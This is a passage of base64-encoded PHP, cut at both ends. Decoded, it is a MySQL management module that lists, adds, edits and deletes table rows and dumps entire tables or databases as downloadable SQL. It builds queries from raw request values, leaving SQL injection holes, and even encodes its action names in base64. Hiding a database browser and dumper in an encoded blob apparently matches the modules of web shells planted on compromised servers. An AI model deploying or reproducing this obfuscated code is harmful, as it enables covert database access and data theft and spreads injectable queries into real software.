AkbXlzcWxIYW5kbGUsICRkYm5hbWUsICR0YWJsZW5hbWUsICRQSFBfU0VMRiwgJGVyck1zZywgJHBhZ2UsICRyb3dwZXJwYWdlLCAkb3JkZXJieTsNCgllY2hvICI8aDE+RGF0YSBpbiBUYWJsZTwvaDE+XG4iOw0KCWlmKCAkdGFibGVuYW1lICE9ICIiICkNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZSAmZ3Q7ICR0YWJsZW5hbWU8L3A+XG4iOw0KCWVsc2UNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJJHF1ZXJ5U3RyID0gc3RyaXBzbGFzaGVzKCAkcXVlcnlTdHIgKTsNCglpZiggJHF1ZXJ5U3RyID09ICIiICkgew0KCQkkcXVlcnlTdHIgPSAiU0VMRUNUICogRlJPTSAkdGFibGVuYW1lIjsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiIE9SREVSIEJZICRvcmRlcmJ5IjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1hZGREYXRhJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRGF0YTwvYT4gfCBcbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgl9DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgJHF1ZXJ5U3RyICk7DQoJJGZpZWxkdCA9IG15c3FsX2ZldGNoX2ZpZWxkKCRwUmVzdWx0KTsNCgkkdGFibGVuYW1lID0gJGZpZWxkdC0+dGFibGU7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJJEdMT0JBTFNbcXVlcnlTdHJdID0gJHF1ZXJ5U3RyOw0KCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJCXJldHVybjsNCgl9DQoJaWYoICRwUmVzdWx0ID09IDEgKSB7DQoJCSRlcnJNc2cgPSAiU3VjY2VzcyI7DQoJCWVjaG9RdWVyeVJlc3VsdCgpOw0KCQlyZXR1cm47DQoJfQ0KCWVjaG8gIjxocj5cbiI7DQoJJHJvdyA9IG15c3FsX251bV9yb3dzKCAkcFJlc3VsdCApOw0KCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCWlmKCAkcm93ID09IDAgKSB7DQoJCWVjaG8gIk5vIERhdGEgRXhpc3QhIjsNCgkJcmV0dXJuOw0KCX0NCglpZiggJHJvd3BlcnBhZ2UgPT0gIiIgKSAkcm93cGVycGFnZSA9IDMwOw0KCWlmKCAkcGFnZSA9PSAiIiApICRwYWdlID0gMDsNCgllbHNlICRwYWdlLS07DQoJbXlzcWxfZGF0YV9zZWVrKCAkcFJlc3VsdCwgJHBhZ2UgKiAkcm93cGVycGFnZSApOw0KCWVjaG8gIjx0YWJsZSBjZWxsc3BhY2luZz0xIGNlbGxwYWRkaW5nPTI+XG4iOw0KCWVjaG8gIjx0cj5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQllY2hvICI8dGg+IjsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJm9yZGVyYnk9Ii4kZmllbGQtPm5hbWUuIic+Ii4kZmllbGQtPm5hbWUuIjwvYT5cbiI7DQoJCWVsc2UNCgkJCWVjaG8gJGZpZWxkLT5uYW1lLiJcbiI7DQoJCWVjaG8gIjwvdGg+XG4iOw0KCX0NCgllY2hvICI8dGggY29sc3Bhbj0yPkFjdGlvbjwvdGg+XG4iOw0KCWVjaG8gIjwvdHI+XG4iOw0KCWZvciggJGkgPSAwOyAkaSA8ICRyb3dwZXJwYWdlOyAkaSsrICkgew0KCQkkcm93QXJyYXkgPSBteXNxbF9mZXRjaF9yb3coICRwUmVzdWx0ICk7DQoJCWlmKCAkcm93QXJyYXkgPT0gZmFsc2UgKSBicmVhazsNCgkJZWNobyAiPHRyPlxuIjsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRqID0gMDsgJGogPCAkY29sOyAkaisrICkgew0KCQkJJGRhdGEgPSAkcm93QXJyYXlbJGpdOw0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaiApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJJGtleSAuPSAiJiIgLiAkZmllbGQtPm5hbWUgLiAiPSIgLiAkZGF0YTsNCgkJCWlmKCBzdHJsZW4oICRkYXRhICkgPiAzMCApDQoJCQkJJGRhdGEgPSBzdWJzdHIoICRkYXRhLCAwLCAzMCApIC4gIi4uLiI7DQoJCQkkZGF0YSA9IGh0bWxzcGVjaWFsY2hhcnMoICRkYXRhICk7DQoJCQllY2hvICI8dGQ+XG4iOw0KCQkJZWNobyAiJGRhdGFcbiI7DQoJCQllY2hvICI8L3RkPlxuIjsNCgkJfQ0KCQlpZiggJGtleSA9PSAiIiApDQoJCQllY2hvICI8dGQgY29sc3Bhbj0yPm5vIEtleTwvdGQ+XG4iOw0KCQllbHNlIHsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWVkaXREYXRhJGtleSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+RWRpdDwvYT48L3RkPlxuIjsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWRlbGV0ZURhdGEka2V5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0RlbGV0ZSBSb3c/JylcIj5EZWxldGU8L2E+PC90ZD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+XG4iOw0KCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlxuIjsNCglpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWxzZQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249cXVlcnkmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcXVlcnlTdHI9JHF1ZXJ5U3RyJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWNobyAoJHBhZ2UrMSkuIi8iLihpbnQpKCRyb3cvJHJvd3BlcnBhZ2UrMSkuIiBwYWdlIjsNCgllY2hvICI8L2ZvbnQ+XG4iOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRwYWdlID4gMCApIHsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnBhZ2U9Ii4oJHBhZ2UpOw0KCQllbHNlDQoJCQllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXF1ZXJ5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnF1ZXJ5U3RyPSRxdWVyeVN0ciZwYWdlPSIuKCRwYWdlKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+UHJldjwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlByZXY8L2ZvbnQ+IjsNCgllY2hvICIgfCAiOw0KCWlmKCAkcGFnZSA8ICgkcm93LyRyb3dwZXJwYWdlKS0xICkgew0KCQlpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kbWxsZDBSaGRHRT0mZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcGFnZT0iLigkcGFnZSsyKTsNCgkJZWxzZQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1xdWVyeSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSZxdWVyeVN0cj0kcXVlcnlTdHImcGFnZT0iLigkcGFnZSsyKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+TmV4dDwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIk5leHQiOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRyb3cgPiAkcm93cGVycGFnZSApIHsNCgkJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBzaXplPTQgbmFtZT1wYWdlPlxuIjsNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdHbyc+XG4iOw0KCX0NCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjwvZm9udD5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZURhdGEoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBEYXRhPC9oMT5cbiI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKSB7DQoJCWVjaG8gIjxoMT5FZGl0IERhdGE8L2gxPlxuIjsNCgkJJHBSZXN1bHQgPSBteXNxbF9saXN0X2ZpZWxkcyggJGRibmFtZSwgJHRhYmxlbmFtZSApOw0KCQkkbnVtID0gbXlzcWxfbnVtX2ZpZWxkcyggJHBSZXN1bHQgKTsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRpID0gMDsgJGkgPCAkbnVtOyAkaSsrICkgew0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkNCgkJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSIgLiAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIiBBTkQgIjsNCgkJCQllbHNlDQoJCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0nIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJyBBTkQgIjsNCgkJfQ0KCQkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCQlteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCQkkcFJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgPSAgIlNFTEVDVCAqIEZST00gJHRhYmxlbmFtZSBXSEVSRSAka2V5IiwgJG15c3FsSGFuZGxlICk7DQoJCSRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJfQ0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRicgbWV0aG9kPXBvc3Q+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWFkZERhdGFfc3VibWl0PlxuIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1lZGl0RGF0YV9zdWJtaXQ+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10YWJsZW5hbWUgdmFsdWU9JHRhYmxlbmFtZT5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9Mj5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+TmFtZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5UeXBlPC90aD5cbiI7DQoJZWNobyAiPHRoPkZ1bmN0aW9uPC90aD5cbiI7DQoJZWNobyAiPHRoPkRhdGE8L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCgkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBSZXN1bHQgKTsNCgkkcFJlc3VsdExlbiA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJCSRmaWVsZG5hbWUgPSAkZmllbGRbIkZpZWxkIl07DQoJCSRmaWVsZHR5cGUgPSAkZmllbGRbIlR5cGUiXTsNCgkJJGxlbiA9IG15c3FsX2ZpZWxkX2xlbiggJHBSZXN1bHRMZW4sICRpICk7DQoJCWVjaG8gIjx0cj4iOw0KCQllY2hvICI8dGQ+JGZpZWxkbmFtZTwvdGQ+IjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJUeXBlIl0uIjwvdGQ+IjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiPHNlbGVjdCBuYW1lPSR7ZmllbGRuYW1lfV9mdW5jdGlvbj5cbiI7DQoJCWVjaG8gIjxvcHRpb24+XG4iOw0KCQllY2hvICI8b3B0aW9uPkFTQ0lJXG4iOw0KCQllY2hvICI8b3B0aW9uPkNIQVJcbiI7DQoJCWVjaG8gIjxvcHRpb24+U09VTkRFWFxuIjsNCgkJZWNobyAiPG9wdGlvbj5DVVJEQVRFXG4iOw0KCQllY2hvICI8b3B0aW9uPkNVUlRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+RlJPTV9EQVlTXG4iOw0KCQllY2hvICI8b3B0aW9uPkZST01fVU5JWFRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+Tk9XXG4iOw0KCQllY2hvICI8b3B0aW9uPlBBU1NXT1JEXG4iOw0KCQllY2hvICI8b3B0aW9uPlBFUklPRF9BRERcbiI7DQoJCWVjaG8gIjxvcHRpb24+UEVSSU9EX0RJRkZcbiI7DQoJCWVjaG8gIjxvcHRpb24+VE9fREFZU1xuIjsNCgkJZWNobyAiPG9wdGlvbj5VU0VSXG4iOw0KCQllY2hvICI8b3B0aW9uPldFRUtEQVlcbiI7DQoJCWVjaG8gIjxvcHRpb24+UkFORFxuIjsNCgkJZWNobyAiPC9zZWxlY3Q+XG4iOw0KCQllY2hvICI8L3RkPlxuIjsNCgkJJHZhbHVlID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YVskaV0pOw0KCQlpZiggJGNtZCA9PSAiYWRkIiApIHsNCgkJCSR0eXBlID0gc3RydG9rKCAkZmllbGR0eXBlLCAiICgsKVxuIiApOw0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8fCAkdHlwZSA9PSAic2V0IiApIHsNCgkJCQllY2hvICI8dGQ+XG4iOw0KCQkJCWlmKCAkdHlwZSA9PSAiZW51bSIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZT5cbiI7DQoJCQkJZWxzZSBpZiggJHR5cGUgPT0gInNldCIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZSBzaXplPTQgbXVsdGlwbGU+XG4iOw0KCQkJCXdoaWxlKCAkc3RyID0gc3RydG9rKCAiJyIgKSApIHsNCgkJCQkJZWNobyAiPG9wdGlvbj4kc3RyXG4iOw0KCQkJCQlzdHJ0b2soICInIiApOw0KCQkJCX0NCgkJCQllY2hvICI8L3NlbGVjdD5cbiI7DQoJCQkJZWNobyAiPC90ZD5cbiI7DQoJCQl9IGVsc2Ugew0KCQkJCWlmKCAkbGVuIDwgNDAgKQ0KCQkJCQllY2hvICI8dGQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTQwIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT48L3RkPlxuIjsNCgkJCQllbHNlDQoJCQkJCWVjaG8gIjx0ZD48dGV4dGFyZWEgY29scz00MCByb3dzPTMgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lPjwvdGV4dGFyZWE+XG4iOw0KCQkJfQ0KCQl9IGVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCQlpZiggJHR5cGUgPT0gImVudW0iIHx8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCWVjaG8gIjx0ZD5cbiI7DQoJCQkJaWYoICR0eXBlID09ICJlbnVtIiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lPlxuIjsNCgkJCQllbHNlIGlmKCAkdHlwZSA9PSAic2V0IiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lIHNpemU9NCBtdWx0aXBsZT5cbiI7DQoJCQkJd2hpbGUoICRzdHIgPSBzdHJ0b2soICInIiApICkgew0KCQkJCQlpZiggJHZhbHVlID09ICRzdHIgKQ0KCQkJCQkJZWNobyAiPG9wdGlvbiBzZWxlY3RlZD4kc3RyXG4iOw0KCQkJCQllbHNlDQoJCQkJCQllY2hvICI8b3B0aW9uPiRzdHJcbiI7DQoJCQkJCXN0cnRvayggIiciICk7DQoJCQkJfQ0KCQkJCWVjaG8gIjwvc2VsZWN0PlxuIjsNCgkJCQllY2hvICI8L3RkPlxuIjsNCgkJCX0gZWxzZSB7DQoJCQkJaWYoICRsZW4gPCA0MCApDQoJCQkJCWVjaG8gIjx0ZD48aW5wdXQgdHlwZT10ZXh0IHNpemU9NDAgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lIHZhbHVlPVwiJHZhbHVlXCI+PC90ZD5cbiI7DQoJCQkJZWxzZQ0KCQkJCQllY2hvICI8dGQ+PHRleHRhcmVhIGNvbHM9NDAgcm93cz0zIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT4kdmFsdWU8L3RleHRhcmVhPlxuIjsNCgkJCX0NCgkJfQ0KCQllY2hvICI8L3RyPiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdBZGQgRGF0YSc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IERhdGEnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0NhbmNlbCcgb25DbGljaz0naGlzdG9yeS5iYWNrKCknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KfQ0KDQpmdW5jdGlvbiBtYW5hZ2VEYXRhX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCSRxdWVyeVN0ciA9ICJJTlNFUlQgSU5UTyAkdGFibGVuYW1lIFZBTFVFUyAoIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCSRxdWVyeVN0ciA9ICJSRVBMQUNFIElOVE8gJHRhYmxlbmFtZSBWQUxVRVMgKCI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bS0xOyAkaSsrICkgew0KCQkkZmllbGQgPSBteXNxbF9mZXRjaF9maWVsZCggJHBSZXN1bHQgKTsNCgkJJGZ1bmMgPSAkR0xPQkFMU1skZmllbGQtPm5hbWUuIl9mdW5jdGlvbiJdOw0KCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJJHF1ZXJ5U3RyIC49ICIgJGZ1bmMoIjsNCgkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkgew0KCQkJJHF1ZXJ5U3RyIC49ICRHTE9CQUxTWyRmaWVsZC0+bmFtZV07DQoJCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJCSRxdWVyeVN0ciAuPSAiKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiLCI7DQoJCX0gZWxzZSB7DQoJCQkkcXVlcnlTdHIgLj0gIiciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXTsNCgkJCWlmKCAkZnVuYyAhPSAiIiApDQoJCQkJJHF1ZXJ5U3RyIC49ICInKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiJywiOw0KCQl9DQoJfQ0KCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCApOw0KCWlmKCAkZmllbGQtPm51bWVyaWMgPT0gMSApDQoJCSRxdWVyeVN0ciAuPSAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIikiOw0KCWVsc2UNCgkJJHF1ZXJ5U3RyIC49ICInIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJykiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCgl2aWV3RGF0YSggIiIgKTsNCn0NCg0KZnVuY3Rpb24gZGVsZXRlRGF0YSgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJJGtleSA9ICIiOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQlpZiggJGZpZWxkLT5udW1lcmljID09IDEgKQ0KCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0iIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICIgQU5EICI7DQoJCQllbHNlDQoJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICInIEFORCAiOw0KCX0NCgkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5U3RyID0gICJERUxFVEUgRlJPTSAkdGFibGVuYW1lIFdIRVJFICRrZXkiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCXZpZXdEYXRhKCAiIiApOw0KfQ0KDQpmdW5jdGlvbiBmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGUpDQp7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwkZGJuYW1lOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5X2lkID0gbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFICR0YWJsZSIsJG15c3FsSGFuZGxlKTsNCgkkdGFibGVkdW1wID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5X2lkLCBNWVNRTF9BU1NPQyk7DQoJJHRhYmxlZHVtcCA9ICJEUk9QIFRBQkxFIElGIEVYSVNUUyAkdGFibGU7XG4iIC4gJHRhYmxlZHVtcFsnQ3JlYXRlIFRhYmxlJ10gLiAiO1xuXG4iOw0KCWVjaG8gJHRhYmxlZHVtcDsNCgkvLyBnZXQgZGF0YQ0KCSRyb3dzID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gJHRhYmxlIiwkbXlzcWxIYW5kbGUpOw0KCSRudW1maWVsZHM9bXlzcWxfbnVtX2ZpZWxkcygkcm93cyk7DQoJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcm93cywgTVlTUUxfTlVNKSkNCgl7DQoJCSR0YWJsZWR1bXAgPSAiSU5TRVJUIElOVE8gJHRhYmxlIFZBTFVFUygiOw0KCQkkZmllbGRjb3VudGVyID0gLTE7DQoJCSRmaXJzdGZpZWxkID0gMTsNCgkJLy8gZ2V0IGVhY2ggZmllbGQncyBkYXRhDQoJCXdoaWxlICgrKyRmaWVsZGNvdW50ZXIgPCAkbnVtZmllbGRzKQ0KCQl7DQoJCQlpZiAoISRmaXJzdGZpZWxkKQ0KCQkJew0KCQkJCSR0YWJsZWR1bXAgLj0gJywgJzsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkZmlyc3RmaWVsZCA9IDA7DQoJCQl9DQoJCQlpZiAoIWlzc2V0KCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkpDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAnTlVMTCc7DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAiJyIgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkgLiAiJyI7DQoJCQl9DQoJCX0NCgkJJHRhYmxlZHVtcCAuPSAiKTtcbiI7DQoJCWVjaG8gJHRhYmxlZHVtcDsNCgl9DQoJQG15c3FsX2ZyZWVfcmVzdWx0KCRyb3dzKTsNCn0NCg0KZnVuY3Rpb24gZHVtcCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkYWN0aW9uLCAkZGJuYW1lLCAkdGFibGVuYW1lOw0KCWlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiICl7DQoJCWhlYWRlcigiQ29udGVudC1kaXNwb3NpdGlvbjogZmlsZW5hbWU9JHRhYmxlbmFtZS5zcWwiKTsNCgkJaGVhZGVyKCdDb250ZW50LXR5cGU6IHVua25vd24vdW5rbm93bicpOw0KCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGVuYW1lKTsNCgkJZWNobyAiXG5cblxuIjsNCgkJZWNobyAiXHJcblxyXG5cclxuIyMjICR0YWJsZW5hbWUgVEFCTEUgRFVNUCBDT01QTEVURUQgIyMjIjsNCgkJZXhpdDsNCgl9ZWxzZXsNCgkJaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBmaWxlbmFtZT0kZGJuYW1lLnNxbCIpOw0KCQloZWFkZXIoJ0NvbnRlbnQtdHlwZTogdW5rbm93bi91bmtub3duJyk7DQoJCW15c3FsX3Nlb